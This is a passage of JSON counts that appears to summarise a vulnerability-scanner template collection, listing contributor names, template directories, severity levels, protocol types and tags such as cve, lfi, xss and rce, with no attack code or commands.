khalane","count":1},{"name":"ahmetpergamum","count":1},{"name":"naglinagli","count":1},{"name":"becivells","count":1},{"name":"its0x08","count":1},{"name":"tirtha_mandal","count":1},{"name":"rodnt","count":1},{"name":"nytr0gen","count":1},{"name":"raesene","count":1},{"name":"vzamanillo","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"brabbit10","count":1},{"name":"@dwisiswant0","count":1},{"name":"mubassirpatel","count":1},{"name":"kareemse1im","count":1},{"name":"dawid-czarnecki","count":1},{"name":"udyz","count":1},{"name":"undefl0w","count":1},{"name":"alperenkesk","count":1},{"name":"b0rn2r00t","count":1},{"name":"notsoevilweasel","count":1},{"name":"jeya seelan","count":1},{"name":"0ut0fb4nd","count":1},{"name":"mhdsamx","count":1},{"name":"yashanand155","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"0xtavian","count":1},{"name":"bolli95","count":1},{"name":"elder tao","count":1},{"name":"retr0","count":1},{"name":"revblock","count":1},{"name":"streetofhackerr007","count":1},{"name":"b4uh0lz","count":1},{"name":"ajaysenr","count":1},{"name":"b0yd","count":1},{"name":"iampritam","count":1},{"name":"remonsec","count":1},{"name":"0h1in9e","count":1},{"name":"defr0ggy","count":1},{"name":"0xrod","count":1},{"name":"sec_hawk","count":1},{"name":"bjhulst","count":1},{"name":"kabirsuda","count":1},{"name":"whynotke","count":1},{"name":"divya_mudgal","count":1},{"name":"soyelmago","count":1},{"name":"shreyapohekar","count":1},{"name":"daviey","count":1},{"name":"alex","count":1},{"name":"_c0wb0y_","count":1},{"name":"rojanrijal","count":1},{"name":"ilovebinbash","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"petruknisme","count":1},{"name":"affix","count":1},{"name":"qlkwej","count":1},{"name":"luskabol","count":1},{"name":"luci","count":1},{"name":"sy3omda","count":1},{"name":"infosecsanyam","count":1},{"name":"furkansenan","count":1},{"name":"_darrenmartyn","count":1},{"name":"makyotox","count":1},{"name":"exploitation","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"toufik airane","count":1},{"name":"d0rkerdevil","count":1},{"name":"push4d","count":1},{"name":"alph4byt3","count":1},{"name":"micha3lb3n","count":1},{"name":"bad5ect0r","count":1},{"name":"borna nematzadeh","count":1},{"name":"absshax","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"willd96","count":1},{"name":"ohlinge","count":1},{"name":"ldionmarcil","count":1},{"name":"elmahdi","count":1},{"name":"juicypotato1","count":1},{"name":"0xteles","count":1},{"name":"ahmed sherif","count":1},{"name":"berkdusunur","count":1},{"name":"patralos","count":1},{"name":"s1r1u5_","count":1},{"name":"sickwell","count":1},{"name":"aresx","count":1},{"name":"philippdelteil","count":1},{"name":"un-fmunozs","count":1},{"name":"mesaglio","count":1},{"name":"yavolo","count":1},{"name":"thevillagehacker","count":1},{"name":"xstp","count":1},{"name":"cookiehanhoan","count":1},{"name":"kre80r","count":1},{"name":"me9187","count":1},{"name":"co0nan","count":1},{"name":"hanlaomo","count":1},{"name":"nerrorsec","count":1},{"name":"akash.c","count":1},{"name":"sicksec","count":1},{"name":"knassar702","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"zandros0","count":1},{"name":"smaranchand","count":1},{"name":"apt-mirror","count":1},{"name":"ipanda","count":1},{"name":"izn0u","count":1},{"name":"andysvints","count":1},{"name":"ooooooo_q","count":1},{"name":"rotemreiss","count":1},{"name":"shelld3v","count":1},{"name":"noamrathaus","count":1},{"name":"fmunozs","count":1},{"name":"omarkurt","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"evolutionsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"gboddin","count":1},{"name":"hakluke","count":1},{"name":"fopina","count":1},{"name":"pdp","count":1},{"name":"shifacyclewla","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"x6263","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"mah3sec_","count":1},{"name":"sshell","count":1},{"name":"52971","count":1},{"name":"blckraven","count":1}],"directory":[{"name":"cves","count":724},{"name":"vulnerabilities","count":299},{"name":"exposed-panels","count":248},{"name":"technologies","count":190},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":642},{"name":"high","count":552},{"name":"medium","count":449},{"name":"critical","count":271},{"name":"low","count":152}],"types":[{"name":"http","count":1962},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":724},{"name":"lfi","count":258},{"name":"panel","count":248},{"name":"xss","count":244},{"name":"exposure","count":231},{"name":"wordpress","count":222},{"name":"rce","count":198},{"name":"tech","count":181},{"name":"cve2020","count":164},{"name":"wp-plugin","count":149},{"name":"cve2021","count":126},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":85},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":53},{"name":"cve2017","count":50},{"name":"unauth","count":46},{"name":"file","count":46},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"ssrf","count":37},{"name":"oracle","count":36},{"name":"","count":36},{"name":"cve2016","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":23},{"name":"misc","count":23},{"name":"disclosure","count":21},{"name":"auth-bypass","count":20},{"name":"generic","count":20},{"name":"cisco","count":19},{"name":"router","count":19},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"debug","count":18},{"name":"cve2014","count":18},{"name":"sap","count":18},{"name":"php","count":16},{"name":"weblogic","count":14},{"name":"cve2011","count":14},{"name":"fuzz","count":14},{"name":"cve2012","count":14},{"name":"login","count":14},{"name":"struts","count":14},{"name":"dns","count":13},{"name":"devops","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"android","count":13},{"name":"dlink","count":12},{"name":"aws","count":12},{"name":"jenkins","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"intrusive","count":9},{"name":"airflow","count":8},{"name":"rails","count":8},{"name":"nginx","count":8},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"cnvd","count":8},{"name":"cms","count":7},{"name":"microsoft","count":7},{"name":"netgear","count":7},{"name":"google","count":7},{"name":"vmware","count":7},{"name":"kubernetes","count":7},{"name":"ibm","count":7},{"name":"coldfusion","count":7},{"name":"cve2009","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"backup","count":7},{"name":"cve2008","count":6},{"name":"django","count":6},{"name":"solr","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"nodejs","count":5},{"name":"deserialization","count":5},{"name":"lucee","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"jolokia","count":5},{"name":"printer","count":5},{"name":"dedecms","count":5},{"name":"drupal","count":5},{"name":"windows","count":5},{"name":"fileupload","count":5},{"name":"circarlife","count":5},{"name":"phpmyadmin","count":5},{"name":"headless","count":5},{"name":"ssti","count":5},{"name":"iis","count":5},{"name":"thinkphp","count":4},{"name":"buffalo","count":4},{"name":"exchange","count":4},{"name":"wso2","count":4},{"name":"hongdian","count":4},{"name":"proxy","count":4},{"name":"glpi","count":4},{"name":"firmware","count":4},{"name":"solarwinds","count":4},{"name":"grafana","count":4},{"name":"moodle","count":4},{"name":"resin","count":4},{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"vpn","count":4},{"name":"traversal","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"strapi","count":4},{"name":"symfony","count":4},{"name":"symantec","count":4},{"name":"crlf","count":4},{"name":"zabbix","count":4},{"name":"hp","count":4},{"name":"zimbra","count":4},{"name":"webserver","count":4},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"git","count":4},{"name":"prometheus","count":3},{"name":"jeesns","count":3},{"name":"vbulletin","count":3},{"name":"camera","count":3},{"name":"ofbiz","count":3},{"name":"firebase","count":3},{"name":"terramaster","count":3},{"name":"bypass","count":3},{"name":"zhiyuan","count":3},{"name":"ebs","count":3},{"name":"springcloud","count":3},{"name":"tikiwiki","count":3},{"name":"microstrategy","count":3},{"name":"kafka","count":3},{"name":"bitrix","count":3},{"name":"injection","count":3},{"name":"jellyfin","count":3},{"name":"druid","count":3},{"name":"bigip","count":3},{"name":"backups","count":3},{"name":"nexus","count":3},{"name":"hoteldruid","count":3},{"name":"fanruan","count":3},{"name":"mail","count":3},{"name":"httpd","count":3},{"name":"itop","count":3},{"name":"openam","count":3},{"name":"targa","count":3},{"name":"nosqli","count":3},{"name":"amazon","count":3},{"name":"fpd","count":3},{"name":"kibana","count":3},{"name":"ssh","count":3},{"name":"cacti","count":3},{"name":"openssh","count":3},{"name":"smtp","count":3},{"name":"mongodb","count":3},{"name":"kevinlab","count":3},{"name":"npm","count":3},{"name":"caucho","count":3},{"name":"linkerd","count":3},{"name":"nacos","count":3},{"name":"telerik","count":3},{"name":"slack","count":3},{"name":"opensis","count":3},{"name":"r-seenet","count":3},{"name":"oa","count":3},{"name":"lfr","count":3},{"name":"log","count":3},{"name":"rstudio","count":2},{"name":"spark","count":2},{"name":"akkadian","count":2},{"name":"cve2007","count":2},{"name":"yapi","count":2},{"name":"globalprotect","count":2},{"name":"avantfax","count":2},{"name":"showdoc","count":2},{"name":"natshell","count":2},{"name":"liferay","count":2},{"name":"ucmdb","count":2},{"name":"minio","count":2},{"name":"rockmongo","count":2},{"name":"mida","count":2},{"name":"paloalto","count":2},{"name":"hashicorp","count":2},{"name":"leak","count":2},{"name":"sitecore","count":2},{"name":"activemq","count":2},{"name":"azure","count":2},{"name":"saltstack","count":2},{"name":"chamilo","count":2},{"name":"axis2","count":2},{"name":"kong","count":2},{"name":"bucket","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"netis","count":2},{"name":"splunk","count":2},{"name":"couchdb","count":2},{"name":"geowebserver","count":2},{"name":"fortios","count":2},{"name":"vrealize","count":2},{"name":"horde","count":2},{"name":"plesk","count":2},{"name":"jsf","count":2},{"name":"totemomail","count":2},{"name":"webcam","count":2},{"name":"middleware","count":2},{"name":"service","count":2},{"name":"cache","count":2},{"name":"flir","count":2},{"name":"xxljob","count":2},{"name":"ecology","count":2},{"name":"chiyu","count":2},{"name":"wuzhicms","count":2},{"name":"sonicwall","count":2},{"name":"seeyon","count":2},{"name":"kentico","count":2},{"name":"idrac","count":2},{"name":"status","count":2},{"name":"frp","count":2},{"name":"cve2005","count":2},{"name":"sharepoint","count":2},{"name":"smb","count":2},{"name":"axis","count":2},{"name":"akamai","count":2},{"name":"nextjs","count":2},{"name":"wordfence","count":2},{"name":"linux","count":2},{"name":"shellshock","count":2},{"name":"getsimple","count":2},{"name":"ilo","count":2},{"name":"favicon","count":2},{"name":"emerge","count":2},{"name":"harbor","count":2},{"name":"prestashop","count":2},{"name":"odoo","count":2},{"name":"huawei","count":2},{"name":"guacamole","count":2},{"name":"github","count":2},{"name":"hasura","count":2},{"name":"waf","count":2},{"name":"pega","count":2},{"name":"qcubed","count":2},{"name":"jboss","count":2},{"name":"maian","count":2},{"name":"keycloak","count":2},{"name":"dolibarr","count":2},{"name":"netsweeper","count":2},{"name":"ec2","count":2},{"name":"icewarp","count":2},{"name":"storage","count":2},{"name":"voipmonitor","count":2},{"name":"phpcollab","count":2},{"name":"trixbox","count":2},{"name":"glassfish","count":2},{"name":"db","count":2},{"name":"mcafee","count":2},{"name":"igs","count":2},{"name":"prtg","count":2},{"name":"hjtcloud","count":2},{"name":"sonarqube","count":2},{"name":"manageengine","count":2},{"name":"backdoor","count":2},{"name":"hpe","count":2},{"name":"dos","count":2},{"name":"aruba","count":2},{"name":"openfire","count":2},{"name":"adminer","count":2},{"name":"yii","count":2},{"name":"nextcloud","count":2},{"name":"grav","count":2},{"name":"jeedom","count":2},{"name":"hostheader-injection","count":2},{"name":"node","count":2},{"name":"bruteforce","count":2},{"name":"faraday","count":1},{"name":"tracer","count":1},{"name":"h3c-imc","count":1},{"name":"nette","count":1},{"name":"commscope","count":1},{"name":"nordex","count":1},{"name":"plugin","count":1},{"name":"hiawatha","count":1},{"name":"k8","count":1},{"name":"bedita","count":1},{"name":"kafdrop","count":1},{"name":"fiori","count":1},{"name":"octoprint","count":1},{"name":"monitorix","count":1},{"name":"csrf","count":1},{"name":"huijietong","count":1},{"name":"sqlite","count":1},{"name":"actuator","count":1},{"name":"qvisdvr","count":1},{"name":"razor","count":1},{"name":"ecoa","count":1},{"name":"tamronos","count":1},{"name":"processmaker","count":1},{"name":"basic-auth","count":1},{"name":"redmine","count":1},{"name":"sangfor","count":1},{"name":"ghost","count":1},{"name":"proftpd","count":1},{"name":"opentsdb","count":1},{"name":"linksys","count":1},{"name":"zenario","count":1},{"name":"lanproxy","count":1},{"name":"fortigates","count":1},{"name":"ognl","count":1},{"name":"logontracer","count":1},{"name":"haproxy","count":1},{"name":"drone","count":1},{"name":"monitorr","count":1},{"name":"setup","count":1},{"name":"gilacms","count":1},{"name":"perl","count":1},{"name":"vsftpd","count":1},{"name":"chyrp","count":1},{"name":"bitly","count":1},{"name":"mysql","count":1},{"name":"salesforce","count":1},{"name":"cse","count":1},{"name":"camunda","count":1},{"name":"clink-office","count":1},{"name":"simplecrm","count":1},{"name":"redhat","count":1},{"name":"daybyday","count":1},{"name":"miscrsoft","count":1},{"name":"redwood","count":1},{"name":"phpinfo","count":1},{"name":"triconsole","count":1},{"name":"flink","count":1},{"name":"olivetti","count":1},{"name":"wamp","count":1},{"name":"gloo","count":1},{"name":"comodo","count":1},{"name":"tenda","count":1},{"name":"gsoap","count":1},{"name":"upnp","count":1},{"name":"addpac","count":1},{"name":"geutebruck","count":1},{"name":"domxss","count":1},{"name":"yachtcontrol","count":1},{"name":"zarafa","count":1},{"name":"maccmsv10","count":1},{"name":"svn","count":1},{"name":"enum","count":1},{"name":"webftp","count":1},{"name":"nedi","count":1},{"name":"dompdf","count":1},{"name":"gespage","count":1},{"name":"primetek","count":1},{"name":"achecker","count":1},{"name":"heroku","count":1},{"name":"synnefo","count":1},{"name":"cockpit","count":1},{"name":"shopizer","count":1},{"name":"concrete","count":1},{"name":"websvn","count":1},{"name":"memcached","count":1},{"name":"mediumish","count":1},{"name":"jfrog","count":1},{"name":"visualtools","count":1},{"name":"wondercms","count":1},{"name":"uwsgi","count":1},{"name":"accela","count":1},{"name":"tensorboard","count":1},{"name":"shiro","count":1},{"name":"tika","count":1},{"name":"xff","count":1},{"name":"darkstat","count":1},{"name":"zookeeper","count":1},{"name":"vnc","count":1},{"name":"szhe","count":1},{"name":"office365","count":1},{"name":"rdp","count":1},{"name":"ioncube","count":1},{"name":"plastic","count":1},{"name":"netrc","count":1},{"name":"spectracom","count":1},{"name":"nuxeo","count":1},{"name":"totaljs","count":1},{"name":"metinfo","count":1},{"name":"pgadmin","count":1},{"name":"clave","count":1},{"name":"bazarr","count":1},{"name":"nexusdb","count":1},{"name":"ilo4","count":1},{"name":"plc","count":1},{"name":"jeewms","count":1},{"name":"pulsesecure","count":1},{"name":"sceditor","count":1},{"name":"craftcms","count":1},{"name":"websphere","count":1},{"name":"74cms","count":1},{"name":"sidekiq","count":1},{"name":"xunchi","count":1},{"name":"pippoint","count":1},{"name":"sco","count":1},{"name":"jenkin","count":1},{"name":"socomec","count":1},{"name":"fastcgi","count":1},{"name":"starttls","count":1},{"name":"commax","count":1},{"name":"myvuehelp","count":1},{"name":"cerebro","count":1},{"name":"rabbitmq","count":1},{"name":"iceflow","count":1},{"name":"traefik","count":1},{"name":"beanshell","count":1},{"name":"b2evolution","count":1},{"name":"mantis","count":1},{"name":"bookstack","count":1},{"name":"viewlinc","count":1},{"name":"sprintful","count":1},{"name":"acme","count":1},{"name":"javafaces","count":1},{"name":"fedora","count":1},{"name":"pacsone","count":1},{"name":"turbocrm","count":1},{"name":"livezilla","count":1},{"name":"vidyo","count":1},{"name":"ssltls","count":1},{"name":"diris","count":1},{"name":"pcoip","count":1},{"name":"pihole","count":1},{"name":"elasticsearch","count":1},{"name":"scs","count":1},{"name":"wing-ftp","count":1},{"name":"webmodule-ee","count":1},{"name":"javamelody","count":1},{"name":"maxsite","count":1},{"name":"nuuo","count":1},{"name":"dotnet","count":1},{"name":"codeigniter","count":1},{"name":"avtech","count":1},{"name":"saltapi","count":1},{"name":"arl","count":1},{"name":"ulterius","count":1},{"name":"rujjie","count":1},{"name":"qsan","count":1},{"name":"rmi","count":1},{"name":"spidercontrol","count":1},{"name":"metabase","count":1},{"name":"keenetic","count":1},{"name":"mobileiron","count":1},{"name":"mrtg","count":1},{"name":"tidb","count":1},{"name":"oidc","count":1},{"name":"rubedo","count":1},{"name":"lotuscms","count":1},{"name":"wifisky","count":1},{"name":"chinaunicom","count":1},{"name":"mongo","count":1},{"name":"blue-ocean","count":1},{"name":"node-red-dashboard","count":1},{"name":"sar2html","count":1},{"name":"froxlor","count":1},{"name":"alertmanager","count":1},{"name":"phalcon","count":1},{"name":"octobercms","count":1},{"name":"webui","count":1},{"name":"exacqvision","count":1},{"name":"swagger","count":1},{"name":"embedthis","count":1},{"name":"sourcebans","count":1},{"name":"tensorflow","count":1},{"name":"glances","count":1},{"name":"dotclear","count":1},{"name":"wildfly","count":1},{"name":"gitlist","count":1},{"name":"netgenie","count":1},{"name":"wooyun","count":1},{"name":"ewebs","count":1},{"name":"qdpm","count":1},{"name":"empirecms","count":1},{"name":"panos","count":1},{"name":"nps","count":1},{"name":"st","count":1},{"name":"wmt","count":1},{"name":"fortiweb","count":1},{"name":"rockethchat","count":1},{"name":"eyou","count":1},{"name":"zend","count":1},{"name":"viewpoint","count":1},{"name":"mantisbt","count":1},{"name":"timeclock","count":1},{"name":"database","count":1},{"name":"expose","count":1},{"name":"phpunit","count":1},{"name":"fortilogger","count":1},{"name":"cyberoam","count":1},{"name":"ntopng","count":1},{"name":"servicedesk","count":1},{"name":"tor","count":1},{"name":"gridx","count":1},{"name":"emby","count":1},{"name":"zzzcms","count":1},{"name":"nsasg","count":1},{"name":"lutron","count":1},{"name":"exposures","count":1},{"name":"hadoop","count":1},{"name":"oneblog","count":1},{"name":"bolt","count":1},{"name":"goahead","count":1},{"name":"appweb","count":1},{"name":"clockwatch","count":1},{"name":"robomongo","count":1},{"name":"parentlink","count":1},{"name":"stem","count":1},{"name":"ecom","count":1},{"name":"linkedin","count":1},{"name":"landray","count":1},{"name":"feifeicms","count":1},{"name":"klog","count":1},{"name":"subrion","count":1},{"name":"duomicms","count":1},{"name":"listserv","count":1},{"name":"zm","count":1},{"name":"centos","count":1},{"name":"crm","count":1},{"name":"kindeditor","count":1},{"name":"spring","count":1},{"name":"powercreator","count":1},{"name":"ambari","count":1},{"name":"calendarix","count":1},{"name":"jsp","count":1},{"name":"wazuh","count":1},{"name":"graphite","count":1},{"name":"openstack","count":1},{"name":"sureline","count":1},{"name":"xvr","count":1},{"name":"luftguitar","count":1},{"name":"moin","count":1},{"name":"frontpage","count":1},{"name":"email","count":1},{"name":"postmessage","count":1},{"name":"varnish","count":1},{"name":"cloudflare","count":1},{"name":"alibaba","count":1},{"name":"seacms","count":1},{"name":"tapestry","count":1},{"name":"nweb2fax","count":1},{"name":"alerta","count":1},{"name":"spf","count":1},{"name":"servicenow","count":1},{"name":"jaspersoft","count":1},{"name":"werkzeug","count":1},{"name":"opm","count":1},{"name":"clockwork","count":1},{"name":"minimouse","count":1},{"name":"visionhub","count":1},{"name":"bash","count":1},{"name":"rfi","count":1},{"name":"expressjs","count":1},{"name":"payara","count":1},{"name":"mariadb","count":1},{"name":"finereport","count":1},{"name":"smi","count":1},{"name":"api-manager","count":1},{"name":"smartblog","count":1},{"name":"csod","count":1},{"name":"chevereto","count":1},{"name":"htmli","count":1},{"name":"kerbynet","count":1},{"name":"aura","count":1},{"name":"pagespeed","count":1},{"name":"gstorage","count":1},{"name":"clusterengine","count":1},{"name":"circontrol","count":1},{"name":"resourcespace","count":1},{"name":"tectuus","count":1},{"name":"sql","count":1},{"name":"mautic","count":1},{"name":"zmanda","count":1},{"name":"bullwark","count":1},{"name":"thinkadmin","count":1},{"name":"yealink","count":1},{"name":"announcekit","count":1},{"name":"pyramid","count":1},{"name":"dnssec","count":1},{"name":"openerp","count":1},{"name":"labtech","count":1},{"name":"postgres","count":1},{"name":"cofax","count":1},{"name":"woocomernce","count":1},{"name":"oscommerce","count":1},{"name":"xiuno","count":1},{"name":"nc2","count":1},{"name":"springframework","count":1},{"name":"k8s","count":1},{"name":"elfinder","count":1},{"name":"trane","count":1},{"name":"ems","count":1},{"name":"wavlink","count":1},{"name":"wavemaker","count":1},{"name":"cloudinary","count":1},{"name":"cgi","count":1},{"name":"weiphp","count":1},{"name":"cve2006","count":1},{"name":"episerver","count":1},{"name":"openemr","count":1},{"name":"mpsec","count":1},{"name":"dom","count":1},{"name":"mara","count":1},{"name":"eprints","count":1},{"name":"soar","count":1},{"name":"svnserve","count":1},{"name":"nimble","count":1},{"name":"magicflow","count":1},{"name":"mailchimp","count":1},{"name":"zte","count":1},{"name":"opensmtpd","count":1},{"name":"realteo","count":1},{"name":"blind","count":1},{"name":"webmin","count":1},{"name":"enumeration","count":1},{"name":"nifi","count":1},{"name":"gateone","count":1},{"name":"couchbase","count":1},{"name":"scimono","count":1},{"name":"bigbluebutton","count":1},{"name":"plone","count":1},{"name":"natemail","count":1},{"name":"shoretel","count":1},{"name":"dbeaver","count":1},{"name":"gitea","count":1},{"name":"opencast","count":1},{"name":"jitsi","count":1},{"name":"solman","count":1},{"name":"argussurveillance","count":1},{"name":"tjws","count":1},{"name":"rsyncd","count":1},{"name":"opensns","count":1},{"name":"floc","count":1},{"name":"rocketchat","count":1},{"name":"erp-nc","count":1},{"name":"hiboss","count":1},{"name":"netmask","count":1},{"name":"fuelcms","count":1},{"name":"aspnuke","count":1},{"name":"azkaban","count":1},{"name":"smartsense","count":1},{"name":"kubeflow","count":1},{"name":"ueditor","count":1},{"name":"redis","count":1},{"name":"openrestry","count":1},{"name":"gotmls","count":1},{"name":"rmc","count":1},{"name":"portainer","count":1},{"name":"fortinet","count":1},{"name":"exponentcms","count":1},{"name":"mongoshake","count":1},{"name":"dotnetnuke","count":1},{"name":"xampp","count":1},{"name":"lotus","count":1},{"name":"xmlchart","count":1},{"name":"phpwiki","count":1},{"name":"apos","count":1},{"name":"optiLink","count":1},{"name":"tongda","count":1},{"name":"myucms","count":1},{"name":"ns","count":1},{"name":"cors","count":1},{"name":"fastapi","count":1},{"name":"blackboard","count":1},{"name":"zcms","count":1},{"name":"fortigate","count":1},{"name":"redcap","count":1},{"name":"webadmin","count":1},{"name":"graphql","count":1},{"name":"lighttpd","count":1},{"name":"trilithic","count":1},{"name":" default-login","count":1},{"name":"hortonworks","count":1},{"name":"centreon","count":1},{"name":"sentry","count":1},{"name":"cocoon","count":1},{"name":"codemeter","count":1},{"name":"auth","count":1},{"name":"karel","count":1},{"name":"default","count":1},{"name":"acontent","count":1},{"name":"rhymix","count":1},{"name":"owa","count":1},{"name":"mirai","count":1},{"name":"kyan","count":1},{"name":"meraki","count":1},{"name":"shopware","count":1},{"name":"ganglia","count":1},{"name":"vscode","count":1},{"name":"pmb","count":1},{"name":"solarlog","count":1},{"name":"phpfusion","count":1},{"name":"landrayoa","count":1},{"name":"tcexam","count":1},{"name":"zms","count":1},{"name":"cherokee","count":1},{"name":"jnoj","count":1},{"name":"vsphere","count":1},{"name":"idemia","count":1},{"name":"extractor","count":1},{"name":"shoppable","count":1},{"name":"dvwa","count":1},{"name":"terraform","count":1},{"name":"s3","count":1},{"name":"cobub","count":1},{"name":"sarg","count":1},{"name":"avalanche","count":1},{"name":"krweb","count":1},{"name":"upload","count":1},{"name":"owasp","count":1},{"name":"dvr","count":1},{"name":"lancom","count":1},{"name":"asus","count":1},{"name":"geddy","count":1},{"name":"etouch","count":1},{"name":"influxdb","count":1},{"name":"tieline","count":1},{"name":"sophos","count":1},{"name":"omi","count":1},{"name":"ssl","count":1},{"name":"gogs","count":1},{"name":"netdata","count":1},{"name":"openx","count":1},{"name":"jenzabar","count":1},{"name":"zyxel","count":1},{"name":"acexy","count":1},{"name":"graylog","count":1},{"name":"wiki","count":1},{"name":"anchorcms","count":1},{"name":"ruby","count":1},{"name":"lansweeper","count":1},{"name":"javascript","count":1},{"name":"eg","count":1},{"name":"biometrics","count":1},{"name":"emc","count":1},{"name":"clickhouse","count":1},{"name":"xdcms","count":1},{"name":"nomad","count":1},{"name":"tileserver","count":1},{"name":"twitter-server","count":1},{"name":"shopxo","count":1},{"name":"spip","count":1},{"name":"ruckus","count":1},{"name":"checkpoint","count":1},{"name":"artica","count":1},{"name":"iptime","count":1},{"name":"apiman","count":1},{"name":"grails","count":1},{"name":"eyelock","count":1},{"name":"phpfastcache","count":1},{"name":"openvpn","count":1},{"name":"mdb","count":1},{"name":"adb","count":1},{"name":"glowroot","count":1},{"name":"whm","count":1},{"name":"discourse","count":1},{"name":"jquery","count":1},{"name":"ricoh","count":1},{"name":"discord","count":1},{"name":"expn","count":1},{"name":"panabit","count":1},{"name":"moinmoin","count":1},{"name":"sage","count":1},{"name":"beanstalk","count":1},{"name":"gunicorn","count":1},{"name":"esmtp","count":1},{"name":"circontrorl","count":1},{"name":"burp","count":1},{"name":"timesheet","count":1},{"name":"majordomo2","count":1},{"name":"doh","count":1},{"name":"skywalking","count":1},{"name":"xml","count":1},{"name":"lg-nas","count":1},{"name":"zeroshell","count":1},{"name":"interlib","count":1},{"name":"tpshop","count":1},{"name":"sgp","count":1},{"name":"jmx","count":1},{"name":"elascticsearch","count":1},{"name":"selea","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":258},{"name":"daffainfo","count":213},{"name":"pdteam","count":196},{"name":"geeknik","count":152},{"name":"dwisiswant0","count":131},{"name":"gy741","count":72},{"name":"pussycat0x","count":65},{"name":"madrobot","count":61},{"name":"princechaddha","count":61},{"name":"gaurang","count":42},{"name":"0x_akoko","count":37},{"name":"ice3man","count":26},{"name":"philippedelteil","count":25},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"kophjager007","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"meme-lord","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"panch0r3d","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"elsfa7110","count":5},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"lu4nx","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"emenalf","count":3},{"name":"incogbyte","count":3},{"name":"fyoorer","count":3},{"name":"0w4ys","count":3},{"name":"shifacyclewala","count":3},{"name":"idealphase","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"z3bd","count":3},{"name":"sushantkamble","count":3},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"skeltavik","count":3},{"name":"tess","count":3},{"name":"mavericknerd","count":3},{"name":"vsh00t","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"johnk3r","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"_generic_human_","count":3},{"name":"unstabl3","count":3},{"name":"shine","count":3},{"name":"foulenzer","count":2},{"name":"randomrobbie","count":2},{"name":"w4cky_","count":2},{"name":"bing0o","count":2},{"name":"0xsmiley","count":2},{"name":"0xsapra","count":2},{"name":"random-robbie","count":2},{"name":"0xcrypto","count":2},{"name":"pxmme1337","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"gevakun","count":2},{"name":"nkxxkn","count":2},{"name":"amsda","count":2},{"name":"parth","count":2},{"name":"socketz","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"arcc","count":2},{"name":"convisoappsec","count":2},{"name":"gal 